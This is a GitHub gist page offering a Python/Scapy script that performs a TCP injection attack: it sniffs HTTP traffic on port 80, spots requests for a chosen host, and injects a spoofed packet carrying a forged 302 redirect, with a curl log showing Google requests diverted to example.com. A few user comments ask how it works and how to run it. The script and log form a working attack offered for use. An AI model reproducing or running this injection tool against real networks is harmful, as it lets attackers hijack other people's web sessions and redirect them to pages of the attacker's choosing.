Last active
December 14, 2022 13:02
-
-
Save inaz2/e4f06900ab75a908ebf15446a7575edb to your computer and use it in GitHub Desktop.
TCP injection attack (HTTP redirection) using Scapy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ sudo python tcp_http_spoof.py >&/dev/null & | |
[1] 3477 | |
$ curl -vL http://www.google.com/ | |
* Hostname was NOT found in DNS cache | |
* Trying 172.217.26.100... | |
* Connected to www.google.com (172.217.26.100) port 80 (#0) | |
> GET / HTTP/1.1 | |
> User-Agent: curl/7.35.0 | |
> Host: www.google.com | |
> Accept: */* | |
> | |
< HTTP/1.1 302 Found | |
< Location: http://www.example.com/ | |
< Content-Length: 0 | |
< Connection: close | |
< | |
* Closing connection 0 | |
* Issue another request to this URL: 'http://www.example.com/' | |
* Hostname was NOT found in DNS cache | |
* Trying 93.184.216.34... | |
* Connected to www.example.com (93.184.216.34) port 80 (#1) | |
> GET / HTTP/1.1 | |
> User-Agent: curl/7.35.0 | |
> Host: www.example.com | |
> Accept: */* | |
> | |
< HTTP/1.1 200 OK | |
< Accept-Ranges: bytes | |
< Cache-Control: max-age=604800 | |
< Content-Type: text/html | |
< Date: Mon, 08 Aug 2016 16:28:39 GMT | |
< Etag: "359670651+gzip" | |
< Expires: Mon, 15 Aug 2016 16:28:39 GMT | |
< Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT | |
* Server ECS (cpm/F9D5) is not blacklisted | |
< Server: ECS (cpm/F9D5) | |
< Vary: Accept-Encoding | |
< X-Cache: HIT | |
< x-ec-custom-error: 1 | |
< Content-Length: 1270 | |
< | |
<!doctype html> | |
(snip) | |
* Connection #1 to host www.example.com left intact |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from scapy.all import * | |
class TCP_HTTP_am(AnsweringMachine): | |
function_name="TCP_HTTP_spoof" | |
filter = "tcp port 80" | |
def parse_options(self, target_host="www.google.com", redirect_url='http://www.example.com/'): | |
self.target_host = target_host | |
self.redirect_url = redirect_url | |
def is_request(self, req): | |
return req.haslayer(Raw) and ("Host: %s" % self.target_host in req.getlayer(Raw).load) | |
def make_reply(self, req): | |
ip = req.getlayer(IP) | |
tcp = req.getlayer(TCP) | |
http_payload = "HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\nConnection: close\r\n\r\n" % self.redirect_url | |
resp = IP(dst=ip.src, src=ip.dst) / TCP(dport=ip.sport,sport=ip.dport, flags="PA", seq=tcp.ack, ack=tcp.seq+len(tcp.payload)) / Raw(load=http_payload) | |
return resp | |
if __name__ == '__main__': | |
conf.L3socket = L3RawSocket | |
TCP_HTTP_am()() |
I believe program makes the response packet but does not send
Is this basically ssl stripping
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
How to use it on a ubuntu machine as a script, I cannot redirect any IP ?